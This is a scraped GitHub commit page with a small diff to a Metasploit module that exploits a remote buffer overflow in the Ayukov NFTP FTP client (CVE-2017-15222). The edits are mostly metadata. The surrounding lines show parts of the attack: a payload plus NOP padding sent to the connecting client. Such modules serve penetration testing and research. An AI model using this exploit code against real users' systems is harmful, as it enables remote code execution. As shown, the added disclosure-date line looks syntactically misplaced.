File tree Expand file tree Collapse file tree 1 file changed +5
-4
lines changed
modules/exploits/windows/ftp Expand file tree Collapse file tree 1 file changed +5
-4
lines changed Original file line number Diff line number Diff line change @@ -10,19 +10,19 @@ class MetasploitModule < Msf::Exploit::Remote
10
10
11
11
def initialize ( info = { } )
12
12
super ( update_info ( info ,
13
- 'Name' => 'Ayukov NFTP FTP Client < 2.0 Remote Buffer Overflow' ,
13
+ 'Name' => 'Ayukov NFTP FTP Client Remote Buffer Overflow' ,
14
14
'Description' => %q{
15
15
This module exploits a buffer overflow in the Ayukov NFTPD FTP client 2.0 and earlier allowing remote code execution.
16
16
} ,
17
17
'Author' =>
18
18
[
19
- 'Berk Cem Göksel ' , # Original exploit author
19
+ 'Berk Cem Goksel ' , # Original exploit author
20
20
'Daniel Teixeira' # MSF module author
21
21
] ,
22
22
'License' => MSF_LICENSE ,
23
23
'References' =>
24
24
[
25
- [ 'CVE' , 'CVE- 2017-15222' ] ,
25
+ [ 'CVE' , '2017-15222' ] ,
26
26
[ 'EDB' , '43025' ] ,
27
27
] ,
28
28
'Payload' =>
@@ -40,6 +40,7 @@ def initialize(info = {})
40
40
'SRVHOST' => '0.0.0.0' ,
41
41
} ,
42
42
'DefaultTarget' => 0 ) )
43
+ 'DisclosureDate' => 'Oct 21 2017' ) )
43
44
44
45
register_options (
45
46
[
@@ -67,7 +68,7 @@ def on_client_connect(client)
67
68
sploit << payload . encoded
68
69
sploit << make_nops ( 15000 - 4116 - 4 - 16 - payload . encoded . length )
69
70
sploit << "\r \n "
70
-
71
+
71
72
client . put ( sploit )
72
73
73
74
client . get_once
You can’t perform that action at this time.
0 commit comments